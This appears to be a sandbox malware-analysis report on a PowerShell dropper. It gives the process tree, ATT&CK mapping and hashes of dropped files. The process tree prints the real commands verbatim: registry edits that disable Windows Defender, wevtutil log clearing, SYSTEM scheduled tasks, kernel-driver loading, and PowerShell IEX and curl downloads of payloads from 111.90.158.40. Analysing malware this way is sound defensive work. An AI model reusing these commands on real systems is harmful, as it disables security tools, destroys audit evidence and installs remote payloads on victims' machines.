PID 1964 wrote to memory of 2376	1964	powershell.exe	sc.exe
PID 1964 wrote to memory of 2376	1964	powershell.exe	sc.exe
PID 1964 wrote to memory of 2376	1964	powershell.exe	sc.exe
PID 1964 wrote to memory of 1124	1964	powershell.exe	sc.exe
PID 1964 wrote to memory of 1124	1964	powershell.exe	sc.exe
PID 1964 wrote to memory of 1124	1964	powershell.exe	sc.exe
PID 1964 wrote to memory of 524	1964	powershell.exe	taskkill.exe
PID 1964 wrote to memory of 524	1964	powershell.exe	taskkill.exe
PID 1964 wrote to memory of 524	1964	powershell.exe	taskkill.exe
PID 1964 wrote to memory of 436	1964	powershell.exe	reg.exe
PID 1964 wrote to memory of 436	1964	powershell.exe	reg.exe
PID 1964 wrote to memory of 436	1964	powershell.exe	reg.exe
PID 1964 wrote to memory of 1208	1964	powershell.exe	reg.exe
PID 1964 wrote to memory of 1208	1964	powershell.exe	reg.exe
PID 1964 wrote to memory of 1208	1964	powershell.exe	reg.exe
PID 1964 wrote to memory of 1180	1964	powershell.exe	reg.exe
PID 1964 wrote to memory of 1180	1964	powershell.exe	reg.exe
PID 1964 wrote to memory of 1180	1964	powershell.exe	reg.exe
PID 1964 wrote to memory of 588	1964	powershell.exe	reg.exe
PID 1964 wrote to memory of 588	1964	powershell.exe	reg.exe
PID 1964 wrote to memory of 588	1964	powershell.exe	reg.exe
PID 1964 wrote to memory of 932	1964	powershell.exe	net.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\get.ps1
1⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Deletes itself
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn MicrosoftsWindowsy /f
2⤵
PID:2584

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn my1 /f
2⤵
PID:2624

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn Mysa /f
2⤵
PID:2752

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn Mysa1 /f
2⤵
PID:2552

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn Mysa2 /f
2⤵
PID:2740

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn Mysa3 /f
2⤵
PID:2640

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn ok /f
2⤵
PID:2528

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /tn oka /f
2⤵
PID:2932

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM lsma12.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2648

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM lsma13.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2444

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM lsma14.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2412

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM lsma22.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2516

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" stop "Windows Critical Updates"
2⤵
- Launches sc.exe
PID:2988

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" delete "Windows Critical Updates"
2⤵
- Launches sc.exe
PID:1916

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" stop UPlugPlay
2⤵
- Launches sc.exe
PID:2376

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" delete UPlugPlay
2⤵
- Launches sc.exe
PID:1124

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqhost.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:524

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:436

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1208

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1180

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
2⤵
- Modifies Windows Defender Real-time Protection settings
PID:588

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start RpcSs
2⤵
PID:932

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start RpcSs
3⤵
PID:1112

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start RpcLocator
2⤵
PID:2384

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start RpcLocator
3⤵
PID:2484

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start RemoteRegistry
2⤵
PID:2696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start RemoteRegistry
3⤵
PID:2708

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start RpcEptMapper
2⤵
PID:2692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start RpcEptMapper
3⤵
PID:2828

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start Winmgmt
2⤵
PID:2976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start Winmgmt
3⤵
PID:2916

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" start WinRM
2⤵
PID:1140

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start WinRM
3⤵
PID:2156

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Application
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1120

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Security
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2252

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Setup
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1936

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl System
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1600

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl "Forwarded Events"
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1824

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Microsoft-Windows-Diagnostics-Performance
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1908

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Microsoft-Windows-AppModel-Runtime/Operational
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2312

C:\Windows\System32\wevtutil.exe
"C:\Windows\System32\wevtutil.exe" cl Microsoft-Windows-Winlogon/Operational
2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Windows\System32\nslookup.exe
"C:\Windows\System32\nslookup.exe" download.yrnvtklot.com. 1.1.1.1
2⤵
PID:608

C:\Windows\System32\nslookup.exe
"C:\Windows\System32\nslookup.exe" ftp.yrnvtklot.com. 1.1.1.1
2⤵
PID:652

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /end /tn OneDriveCloudSync
2⤵
PID:2868

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn OneDriveCloudSync /tr "cmd.exe /c C:\Windows\System32\sc.exe start msdtc" /sc minute /mo 20 /ru SYSTEM /F
2⤵
- Creates scheduled task(s)
PID:1428

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /end /tn DefaultBrowserUpdate
2⤵
PID:2132

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn DefaultBrowserUpdate /tr C:\Users\Public\run.bat /sc minute /mo 60 /ru SYSTEM /F
2⤵
- Creates scheduled task(s)
PID:2480

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /end /tn OneDriveCloudBackup
2⤵
PID:2476

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn OneDriveCloudBackup /tr "cmd.exe /c start C:\Windows\Fonts\smartsscreen.exe" /sc minute /mo 40 /ru SYSTEM /F
2⤵
- Creates scheduled task(s)
PID:1064

C:\windows\system32\expand.exe
"C:\windows\system32\expand.exe" C:\Windows\System32\drivers\aswArPots.sys.tmp C:\Windows\System32\drivers\aswArPots.sys
2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
PID:3016

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" create aswArPots binPath= "C:\Windows\System32\drivers\aswArPots.sys" type= kernel start= auto
2⤵
- Launches sc.exe
PID:1748

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" start aswArPots
2⤵
- Launches sc.exe
PID:1920

C:\windows\system32\expand.exe
"C:\windows\system32\expand.exe" C:\Windows\System32\drivers\IObitUnlockers.sys.tmp C:\Windows\System32\drivers\IObitUnlockers.sys
2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
PID:2328

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" create IObitUnlockers binPath= "C:\Windows\System32\drivers\IObitUnlockers.sys" type= kernel start= auto
2⤵
- Launches sc.exe
PID:1688

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" start IObitUnlockers
2⤵
- Launches sc.exe
PID:1596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c "IEX ((new-object net.webclient).downloadstring('http://111.90.158.40/kill.png?random=20240328084732'))"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2104

C:\windows\system32\expand.exe
"C:\windows\system32\expand.exe" C:\Windows\Fonts\curl.exe.tmp C:\Windows\Fonts\curl.exe
2⤵
- Drops file in Windows directory
PID:1700

C:\Windows\Fonts\curl.exe
"C:\Windows\Fonts\curl.exe" -C - http://111.90.158.40/smartsscreen.png?random=20240328084732 -o "C:\Windows\Fonts\smartsscreen.exe.tmp" --connect-timeout 30 --retry 10
2⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:664

C:\windows\system32\expand.exe
"C:\windows\system32\expand.exe" C:\Windows\Fonts\smartsscreen.exe.tmp C:\Windows\Fonts\smartsscreen.exe.tmp2
2⤵
- Drops file in Windows directory
PID:584

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /im smartsscreen.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1440

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /run /tn OneDriveCloudBackup
2⤵
PID:2828

C:\windows\system32\expand.exe
"C:\windows\system32\expand.exe" C:\Windows\System32\oci.dll.tmp C:\Windows\System32\oci.dll
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1992

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" stop msdtc
2⤵
- Launches sc.exe
PID:1924

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" config msdtc obj= localsystem
2⤵
- Launches sc.exe
PID:1976

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" failure msdtc reset= 600 actions= restart/600000/restart/600000/restart/600000
2⤵
- Launches sc.exe
PID:1972

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" config msdtc start= auto
2⤵
- Launches sc.exe
PID:1080

C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" start msdtc
2⤵
- Launches sc.exe
PID:700

C:\Windows\system32\taskeng.exe
taskeng.exe {867604F3-9FB8-4939-B616-F3020331F541} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2472

C:\Windows\system32\cmd.exe
cmd.exe /c start C:\Windows\Fonts\smartsscreen.exe
2⤵
PID:1140

C:\Windows\Fonts\smartsscreen.exe
C:\Windows\Fonts\smartsscreen.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2252

C:\Windows\SysWOW64\sc.exe
C:\Windows\System32\sc.exe create aswArPots binPath= C:\Windows\System32\drivers\aswArPots.sys type= kernel start= auto
4⤵
- Launches sc.exe
PID:1656

C:\Windows\Fonts\curl.exe
C:\Windows\Fonts\curl.exe -C - http://111.90.158.40:80/taskhostw.png?t=1711615672 -o C:\Windows\Fonts\taskhostw.png --connect-timeout 30 --retry 10
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1676

C:\Windows\SysWOW64\sc.exe
C:\Windows\System32\sc.exe start aswArPots
4⤵
- Launches sc.exe
PID:2292

C:\Windows\SysWOW64\sc.exe
C:\Windows\System32\sc.exe create IObitUnlockers binPath= C:\Windows\System32\drivers\IObitUnlockers.sys type= kernel start= auto
4⤵
- Launches sc.exe
PID:2152

C:\Windows\SysWOW64\sc.exe
C:\Windows\System32\sc.exe start IObitUnlockers
4⤵
- Launches sc.exe
PID:1216

C:\Windows\SysWOW64\expand.exe
C:\Windows\System32\expand.exe C:\Windows\Fonts\taskhostw.png C:\Windows\Fonts\taskhostw.exe
4⤵
- Drops file in Windows directory
PID:1800

C:\Windows\Fonts\curl.exe
C:\Windows\Fonts\curl.exe -C - http://111.90.158.40:80/config.json?t=1711615680 -o C:\Windows\Fonts\config.json --connect-timeout 30 --retry 10
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1068

C:\Windows\Fonts\curl.exe
C:\Windows\Fonts\curl.exe -C - http://111.90.158.40:80/WinRing0x64.png?t=1711615682 -o C:\Windows\Fonts\WinRing0x64.png --connect-timeout 30 --retry 10
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2788

C:\Windows\SysWOW64\expand.exe
C:\Windows\System32\expand.exe C:\Windows\Fonts\WinRing0x64.png C:\Windows\Fonts\WinRing0x64.sys
4⤵
- Drops file in Windows directory
PID:2684

C:\Windows\Fonts\taskhostw.exe
C:\Windows\Fonts\taskhostw.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2248

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarB0C0.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
cbda34f1dec4b59cfbe8820ed579762e

SHA1
44a4be3d33b955c992e68ced2dd5e9be5a89dd33

SHA256
942e80c0ea5a734bbd803cab685678d17cf48b94a29881d0434bc9e7799f3c19

SHA512
02d34117287a563d328be892e22a921ee98fe1b9162a11d62a6e32c805a9831904674138beca4683a9ea1fa5121e42cae70cba4e8130ce397d4b3dea042ad7bc

Download Submit
C:\Windows\Fonts\WinRing0x64.sys
Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Windows\Fonts\config.json
Filesize
1KB

MD5
e0dc65dbfbf42f6dd4b2c3645dc00fec

SHA1
02b449bedb5d94cd3e64d279038b5d992d3e2eac

SHA256
c1f454826119be38e3ffb0346572631ca5e81b1b075f8b2359d5afbb4e215860

SHA512
46a03979c1865d1c8fffdc066f3c172ece51f4670e5eea8443fba6fe3d6b2eadf676cdda9e32ca14bf912095960236034cc1116b0230ca6cc5b28205b76e58ff

Download Submit
C:\Windows\Fonts\curl.exe
Filesize
479KB

MD5
69cac8a16eb9fdcdb1a1617842fd8dd9

SHA1
c66e0065431bd034e366d98722a5cb1cdfedbb56

SHA256
52ff78c647d18ca68552dea4e1b51c7582e3b1302af171a97ca641d3562f0561

SHA512
42bbee0702477e65c29740867faa92bb4aadba84bc98e00eb008441810520debb91a9bbe51e19d348ba651cab1ac9825b11d7235799d60531ad8ec9949c329b8

Download Submit
C:\Windows\Fonts\smartsscreen.exe
Filesize
3.8MB

MD5
7480668194050926364415887c4acb30

SHA1
70bb422cd7d4423ab420b4178369df416f5e8529

SHA256
6ff36ceb81b3b92b49b370a568a5f8670bd1902231a263c706e21d63be984ca2

SHA512
16a82644d1c008ed97ac9b21f607584997928427daecdf716b3deb692114ff15215686c2ff4d35b381a781901649655abf69b48d8b5e55243bd64d9be2bdb771

Download Submit
C:\Windows\Fonts\smartsscreen.exe.tmp2
Filesize
4.2MB

MD5
18957d83337a7f6a879d739be02b173e

SHA1
125982676af23e93fa58b31ef1bdb93725cb91c3

SHA256
2fe78941d74d35f721556697491a438bf3573094d7ac091b42e4f59ecbd25753

SHA512
47e9029e8def90a17884423e3caa98a4f99f7e08397074c6a49b7130a464b9bd6406dbf3dac75f48483cc80cc155f6f2a47bdd58a5084230163ca16d1d8c77f9

Download Submit
C:\Windows\Fonts\taskhostw.exe
Filesize
5.4MB

MD5
bd877072c51ee58ec7aaf091bff0b80c

SHA1
41fce204948df6af1fe2f3f6dec02086678eab3b

SHA256
35eb368c14ad25e3b1c58579ebaeae71bdd8ef7f9ccecfc00474aa066b32a03f

SHA512
27e90612a735f1296dd3a80b7538a780b8a2d30a2f63782e90dda1a12ca070d701c077719c50ded4fdbe68af511f5767015efe1137620b955e0ace2ab397f655

Download Submit
C:\Windows\Fonts\taskhostw.exe
Filesize
2.1MB

MD5
18fd2cffb1f82cbdb9ea01c6e081f584

SHA1
7b0641971823095165c667a847c26aae60042265

SHA256
eaa2b3a1491bf6a10a1ce38369268ef750c4a399d6990777418981053237d499

SHA512
fc981290d958e2431bb1494b46624bd3a04268210720876f2616790cd46aca6828d16c6ff783f0f11f7d3068cf9c50702055ea40d592095e5255acaba08dd6e2

Download Submit
C:\Windows\Logs\DPX\setupact.log
Filesize
1KB

MD5
68567881872f3148d28fac2bc596f201

SHA1
148003cc771b6f507355dfbd2fb8555074281e13

SHA256
54013e7fcb8fcd3b198c60e5e11e84a03721580b8cbed2efba7ed6a8491de07e

SHA512
fddb5d764e465e9f749b052f62fdac021d784fc90d980876fd300df43f21d05a8bea3c09470e26604c8cdb7300cd66092717445dd04bd74a0ee3ed8aa3c62749

Download Submit
C:\Windows\Logs\DPX\setupact.log
Filesize
2KB

MD5
4edc0b58c0bcd7a2fb5717acf6e64cf2

SHA1
8ffbb94d30fa94f3171ba3b06816ce6a7533f259

SHA256
98431e89912e010156a1e7cd1b8193ac74a807b469b3bc57952edf7dc6e24e95

SHA512
bb2bb9a4fe7de4d1f9afcd50ac31e535c5881bc48d375606f56bbd6d4da498006f0768e90b5a43c96faa37c4c269dbe735af3673f22f66b971d7d0eb7ee17070

Download Submit
C:\Windows\Logs\DPX\setupact.log
Filesize
3KB

MD5
de409bd489e6cd379e9ce15193b3ca7e

SHA1
b0647bb1be9887dfb13ea29653c34df7bdc8a9b1

SHA256
9372ab7b6f50cccc5b2410a053cdcbdc9086718c984e9c98a25bb45b7830879a

SHA512
7dc6e2e201df1bb648b846aee0320ef6642a9ba248c530baf0283b9e6e43ae758b21288331807bc90288c5368dd0a889332f30e777a1be1196cdcb49b0d30ab0

Download Submit
C:\Windows\Logs\DPX\setupact.log
Filesize
4KB

MD5
54197915f89c9e97f12615679ea7787d

SHA1
8ae4a2bd2a571bff611b2ef17720df067cda62c9

SHA256
1b7fab8aa09302b38919b5578d15bc4228542a1ca174d956505b83fbdd6a97a3

SHA512
e5dfa572267e386a6ed3d39642708b2707746f6aa56d89e1018fea39885342ba1647235599871bfbb58afa698bbebcbb7c5f2d6798d77073c39c78931bbaa184

Download Submit
C:\Windows\Logs\DPX\setupact.log
Filesize
4KB

MD5
22327089af9fa364568c901f705b472f

SHA1
3dcda17936ccb32177d03d3e248d8308b7c4b9b8

SHA256
0a699a3f02617179f995dc41fe9c3e9e39417139548b4689ae993729190799a4

SHA512
511cece74a36b1df6ce2fb38da6d0200b22096981b78f1f4a636ae67f5cb20376a29094a4ab857e19818e672b790401acf9f769a12582c93b501e7df1339caae

Download Submit
C:\Windows\Logs\DPX\setupact.log
Filesize
5KB

MD5
7efc3d9872df7c12cb18be6f75cceeda

SHA1
829c65936eaa325abdcd3fb4cdfbb7adcf2f8f55

SHA256
d144542e6daa8d34bd6e2dc8052b861b45de81d58e314637031c172fab2a1022

SHA512
507b9cda78792cb94be7ad3fbf26238e898e8011c8658e84490a17932fbd69bee3a4e8b7f1e11a27f16138650156750cf789fd89189745be7760c58ba708a913

Download Submit
C:\Windows\System32\drivers\IObitUnlockers.sys
Filesize
35KB

MD5
d7b749051da5fb4604f4141f19c47660

SHA1
288daefd1ce65fb01011dc8a64491111207d3965

SHA256
2b33df9aff7cb99a782b252e8eb65ca49874a112986a1c49cd9971210597a8ae

SHA512
1d0ac1854eb6f2a5d2d90424bc5b9dd989ad61a2f3e87d6e9ca97a7f5f7c0d38b387cfd3e16b14992ea263b5d4194b0d38b8b8a6f5b1d0829a6932fde127c193

Download Submit
C:\Windows\System32\drivers\aswArPots.sys
Filesize
203KB

MD5
a179c4093d05a3e1ee73f6ff07f994aa

SHA1
5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4

SHA256
4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1

SHA512
788682500c548fa55a3ac6b0bc3f9fe77c2d1695f7bce808269b4aa2842450295c87981669ece74f8591e1b51045e4071d0ca61362eb3a02bd6ad2041f9a8918

Download Submit
C:\Windows\System32\oci.dll
Filesize
303KB

MD5
4c8e4c5c0e150c210cd2014a84e39ec6

SHA1
d6dfce664ee28cdcf143da2ec71d2a0ff18c1280

SHA256
3ced0552b9ecf3dfecd14cbcc3a0d246b10595d5048d7f0d4690e26ecccc1150

SHA512
d2366618edc0aa990940947304b38622b6538c2007ef370df3d9bd7be5eb64234e949729884b983cd8e82b6c166b030b6404c4bcdd7880213ba9d240ac45f30e

Download Submit
\??\c:\windows\fonts\curl.exe.tmp
Filesize
263KB

MD5
eca70588d25cef61c5f903ed6e275709

SHA1
018afdb9359585efe15f173b2d9168880de27204

SHA256
95d0c1184cf8d22f466ef9a25e98662b9cc33e054658453bf1a152bf5e5fc4c1

SHA512
aa315b61191f7548c95252aa37c38ddc38bfc8bf57f2774b61e87cbdb78b13d3a68611f3a5a9b8f0d33aa477d8dfdf0df4b5b45214b5649a8489b3c35723ba9b

Download Submit
\??\c:\windows\fonts\smartsscreen.exe.tmp
Filesize
1.8MB

MD5
c3834835873b9d7d6b9a2436f748aa51

SHA1
3855c5e50e59c8931c7c0469075590aed54cf71b

SHA256
792842443deca9bbd306ddee49bb0c8c9ceace2eb89042291a628ffff2c4eab3

SHA512
c93bbc45fd0b0789a52b8eb756675176244a374c40dacbfc4aa1910938d75916616fa8ecc021ed51815e0f6bb4b2ede8790134393bf7f497a98c502cd2a77ee5

Download Submit
\??\c:\windows\fonts\taskhostw.png
Filesize
2.3MB

MD5
dc6cd17105168171c27fb167239636e1

SHA1
5cfc86dd2ca119f056e5561dddf36a1a8aa3c32e

SHA256
c5795c4ae2cc1ce89bf8421241bc9e7e926e38e065eb1bbb7a7771fbb78d3cc1

SHA512
a784b051f96bfaa5d830f9efeb0d5b5a071b251fa0852975bd4c3c5439b6661e28d0dc79aa298d93905603641b8497bbb2124d590f820ddb9823b7979c9c7f9b

Download Submit
\??\c:\windows\fonts\winring0x64.png
Filesize
7KB

MD5
8d31ae369e67ee0b412d889299f2b4b2

SHA1
c643a490023aa45806760a1b84d15c434a326e0b

SHA256
be6b20e6a49225144e918e3607684f8bebbf190aa30ef2f42f06a8eb4fdaef6f

SHA512
7f312046908556fd24335b2cb93410bb3b158932eb66b6c20ee8336748e68463b3d6ca8dfa4ad303ee7193560e0c9b4f22bb6397ac5ea9e2e0e8fc82be95bbd5

Download Submit
\??\c:\windows\system32\drivers\aswarpots.sys.tmp
Filesize
111KB

MD5
851284b85aca7d8e966f3f0dcf9aa33b

SHA1
916747a0c17c3e5ba931b259153ff67c071b991e

SHA256
fdca346264db6c2c112f3661b7a41314ec048fc08e97ef1842e298f361ecede6

SHA512
4435796dbf945b6331ff281146d1785ff7258f95b97e56f463a29f43effac74b5e0a31889da315c9b258890083832dbbd0ed58a7245c1afae2edad85139ccc63

Download Submit
\??\c:\windows\system32\drivers\iobitunlockers.sys.tmp
Filesize
18KB

MD5
aa8ffe5d6495afb8515e1b7c27a7a4ac

SHA1
ee01a179597c5580923864f39040e4cba6a6659f

SHA256
1ca472a087279a36ec239c953ad249d358d7b6b7a0941fdcdb9f02518f320d0f

SHA512
e3ddf29b26e3d41f88a72778a2caac6ab5d883e61552c4e136774e6103e2ebf6023431a1df0358bbc07f999b0d0b0ff2ddd2adfa5b41a19dc4ffac91687e0322

Download Submit
\??\c:\windows\system32\oci.dll.tmp
Filesize
148KB

MD5
1801337ff3c1cbec9b97ed0f7b79ac0b

SHA1
3319998596f05e3688fba71faf7ad3d6063d23c8

SHA256
0d2039d41bc4261c2f59dff7500af5d628c57889f2e0e557d87c71ed2e852b25

SHA512
f230ffa10699461f23a1889be5a1b63a8b475ab983af67a010e1f7abde7d19a6d1251c9625a2a35b9109fc95858499c68f0b4e3fc060da55ca2ad169e63811f6

Download Submit
\Windows\Fonts\taskhostw.exe
Filesize
2.2MB

MD5
19283075c08421feb82a3459aab3aebf

SHA1
dacb0110b0ca734aa75ddac9752cada3d59b4a96

SHA256
4f31f7fb6af44b4263ec79f501d7f95fab29487a8382681676cfa1d4ee5bcf25

SHA512
ace27b6f199f6fa0c610421ac9a064cab9193129bed59e2dad8fbc330e4db423cf68bd3219bb361b438cc66b8c2720d5f747fab89be60912949f2480ec80048c

Download Submit
\Windows\Fonts\taskhostw.exe
Filesize
2.4MB

MD5
bfd92038c611eeb353d78f16d15d1946

SHA1
0dbd398699da0c4ded32037258fa60a2c7eed578

SHA256
60a7d1bc1606d8677369608e03781f6225063ed8b73a872bd6f7047a86c18099

SHA512
8f3fcd7e8085de85a7cbec9739997ceb54d58c00986d5b8cbdfb8f680825f533f5cac523f1cad3dcc6c86e500adedf3db03021a1f2c35b24cfa34cd2e6bb1b7a

Download Submit
memory/664-172-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/664-167-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/1068-213-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/1068-211-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
